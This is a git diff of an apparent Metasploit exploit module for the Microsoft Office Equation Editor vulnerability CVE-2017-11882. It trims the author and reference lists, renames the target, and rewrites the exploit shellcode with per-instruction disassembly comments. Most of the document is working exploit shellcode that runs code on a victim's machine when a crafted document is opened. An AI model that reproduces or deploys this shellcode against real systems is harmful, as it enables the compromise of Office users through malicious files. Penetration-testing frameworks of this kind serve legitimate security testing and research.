diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 37f096f7ac..6aafc49c14 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -22,18 +22,17 @@ class MetasploitModule < Msf::Exploit::Remote a length of 109 bytes to be executed Affects Microsoft Office word for the latest 17 years. }, - 'Author' => ['mumbai', 'embedi', 'BlackMathIT'], + 'Author' => ['mumbai', 'embedi'], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Nov 15 2017', 'References' => [ ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'], - ['URL', 'https://github.com/embedi/CVE-2017-11882'], - ['URL', 'https://github.com/BlackMathIT/2017-11882_Generator/blob/master/2017-11882_Generator.py'] + ['URL', 'https://github.com/embedi/CVE-2017-11882'] ], 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ - ['Microsoft Office Word', {} ], + ['Microsoft Office', {} ], ], 'DefaultTarget' => 0, 'Payload' => { @@ -131,11 +130,43 @@ class MetasploitModule < Msf::Exploit::Remote header << "000000000000000000000000000000000000000000000000000000000000000\n" - shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00" - shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ" - shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09" - shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53" - shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90" + shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0 + shellcode << "\x00\x00" # 2: 00 00 add BYTE PTR [eax],al + shellcode << "\x02\x00" # 4: 02 00 add al,BYTE PTR [eax] + shellcode << "\x9e" # 6: 9e sahf + shellcode << "\xc4\xa9\x00\x00\x00\x00" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0] + shellcode << "\x00\x00" # d: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\xc8" # f: 00 c8 add al,cl + shellcode << "\xa7" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi] + shellcode << "\\" # 12: 5c pop esp + shellcode << "\x00\xc4" # 13: 00 c4 add ah,al + shellcode << "\xee" # 15: ee out dx,al + shellcode << "[" # 16: 5b pop ebx + shellcode << "\x00\x00" # 17: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\x00" # 19: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\x03" # 1b: 00 03 add BYTE PTR [ebx],al + shellcode << "\x01\x01" # 1d: 01 01 add DWORD PTR [ecx],eax + shellcode << "\x03\n" # 1f: 03 0a add ecx,DWORD PTR [edx] + shellcode << "\n\x01" # 21: 0a 01 or al,BYTE PTR [ecx] + shellcode << "\x08ZZ" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl + shellcode << "\xB8\x44\xEB\x71\x12" # 26: b8 44 eb 71 12 mov eax,0x1271eb44 + shellcode << "\xBA\x78\x56\x34\x12" # 2b: ba 78 56 34 12 mov edx,0x12345678 + shellcode << "\x31\xD0" # 30: 31 d0 xor eax,edx + shellcode << "\x8B\x08" # 32: 8b 08 mov ecx,DWORD PTR [eax] + shellcode << "\x8B\x09" # 34: 8b 09 mov ecx,DWORD PTR [ecx] + shellcode << "\x8B\x09" # 36: 8b 09 mov ecx,DWORD PTR [ecx] + shellcode << "\x66\x83\xC1\x3C" # 38: 66 83 c1 3c add cx,0x3c + shellcode << "\x31\xDB" # 3c: 31 db xor ebx,ebx + shellcode << "\x53" # 3e: 53 push ebx + shellcode << "\x51" # 3f: 51 push ecx + shellcode << "\xBE\x64\x3E\x72\x12" # 40: be 64 3e 72 12 mov esi,0x12723e64 + shellcode << "\x31\xD6" # 45: 31 d6 xor esi,edx + shellcode << "\xFF\x16" # 47: ff 16 call DWORD PTR [esi] + shellcode << "\x53" # 49: 53 push ebx + shellcode << "\x66\x83\xEE\x4C" # 4a: 66 83 ee 4c sub si,0x4c + shellcode << "\xFF\x10" # 4e: ff 10 call DWORD PTR [eax] + shellcode << "\x90" # 50: 90 nop + shellcode << "\x90" # 50: 90 nop footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'